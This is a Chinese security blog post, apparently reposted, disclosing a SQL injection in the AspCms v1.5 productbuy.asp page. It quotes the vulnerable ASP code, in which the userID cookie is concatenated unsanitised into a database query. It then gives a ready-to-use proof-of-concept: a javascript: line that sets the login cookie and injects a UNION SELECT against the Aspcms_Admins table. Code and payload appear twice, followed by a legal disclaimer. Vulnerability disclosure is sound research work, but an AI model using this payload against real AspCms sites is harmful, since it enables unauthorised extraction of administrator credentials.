AspCms_v1.5_20110517 SQL注射

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日17:49:13评论308 views字数 1940阅读6分28秒阅读模式
摘要

废话不多说,看代码:<% if action = "buy" then addOrder() else echoContent() end if ……略过 Sub echoContent() dim id id=getForm("id","get") if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct Dim templatePath,tempStr templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html" set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1") selectproduct=rsObj(0) Dim linkman,gender,phone,mobile,email,qq,address,postcode if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0 if rCookie("loginstatus")=1 then set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1") linkman=rsObj("truename") gender=rsObj("gender") phone=rsObj("phone") mobile=rsObj("mobile") email=rsObj("email") qq=rsObj("qq") address=rsObj("address") postcode=rsObj("postcode") else gender=1 end if rsObj.close() www.2cto.com with templateObj .content=loadFile(templatePath) .parseHtml() .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct) .content=replaceStr(.content,"[aspcms:linkman]",linkman) .content=replaceStr(.content,"[aspcms:gender]",gender) .content=replaceStr(.content,"[aspcms:phone]",phone) .content=replaceStr(.content,"[aspcms:mobile]",mobile) .content=replaceStr(.content,"[aspcms:email]",email) .content=replaceStr(.content,"[aspcms:qq]",qq) .content=replaceStr(.content,"[aspcms:address]",address) .content=replaceStr(.content,"[aspcms:postcode]",postcode) .parseCommon() echo .content end with set templateobj =nothing : terminateAllObjects End Sub 漏洞很明显,没啥好说的 poc: javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注入漏洞。。。。。。。

废话不多说,看代码:

<% if action = "buy" then     addOrder() else     echoContent() end if   ……略过   Sub echoContent()     dim id     id=getForm("id","get")          if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"           dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")     dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct     Dim templatePath,tempStr     templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"       set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")     selectproduct=rsObj(0)          Dim linkman,gender,phone,mobile,email,qq,address,postcode     if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0     if rCookie("loginstatus")=1 then         set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")         linkman=rsObj("truename")         gender=rsObj("gender")         phone=rsObj("phone")         mobile=rsObj("mobile")         email=rsObj("email")         qq=rsObj("qq")         address=rsObj("address")         postcode=rsObj("postcode")     else          gender=1     end if     rsObj.close()       www.2cto.com       with templateObj          .content=loadFile(templatePath)             .parseHtml()         .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)         .content=replaceStr(.content,"[aspcms:linkman]",linkman)                 .content=replaceStr(.content,"[aspcms:gender]",gender)                 .content=replaceStr(.content,"[aspcms:phone]",phone)                 .content=replaceStr(.content,"[aspcms:mobile]",mobile)                 .content=replaceStr(.content,"[aspcms:email]",email)                     .content=replaceStr(.content,"[aspcms:qq]",qq)                     .content=replaceStr(.content,"[aspcms:address]",address)                     .content=replaceStr(.content,"[aspcms:postcode]",postcode)             .parseCommon()                  echo .content      end with     set templateobj =nothing : terminateAllObjects End Sub 漏洞很明显,没啥好说的 poc:   javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日17:49:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AspCms_v1.5_20110517 SQL注射https://cn-sec.com/archives/70766.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息